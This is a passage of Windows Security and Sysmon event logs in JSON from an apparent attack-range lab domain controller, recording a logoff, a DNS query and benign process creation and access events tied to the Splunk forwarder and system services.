{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220440,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64A8A\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x64a8a","LogonType":"3","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4218,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:37.179\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001044C20200}\r\nProcessId: 2904\r\nQueryName: win-dc-6178966.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\dfsrs.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:58:37.179","ProcessGuid":"{41C8662E-1F73-5F25-0000-001044C20200}","QueryName":"win-dc-6178966.attackrange.local","QueryStatus":"0","QueryResults":"fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\dfsrs.exe","EventReceivedTime":"2020-08-01 07:58:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4219,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:40.627\r\nProcessGuid: {41C8662E-20B0-5F25-0000-0010EE4B0600}\r\nProcessId: 4644\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:40.627","ProcessGuid":"{41C8662E-20B0-5F25-0000-0010EE4B0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4220,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:40.626\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-20B0-5F25-0000-0010EE4B0600}\r\nTargetProcessId: 4644\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:40.626","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-20B0-5F25-0000-0010EE4B0600}","TargetProcessId":"4644","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4221,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:40.626\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20B0-5F25-0000-0010EE4B0600}\r\nTargetProcessId: 4644\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:40.626","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20B0-5F25-0000-0010EE4B0600}","TargetProcessId":"4644","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4222,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:40.626\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:40.626","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4223,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:40.626\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:40.626","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4224,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:40.626\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:40.626","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4225,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:40.626\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:40.626","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4226,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:40.626\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 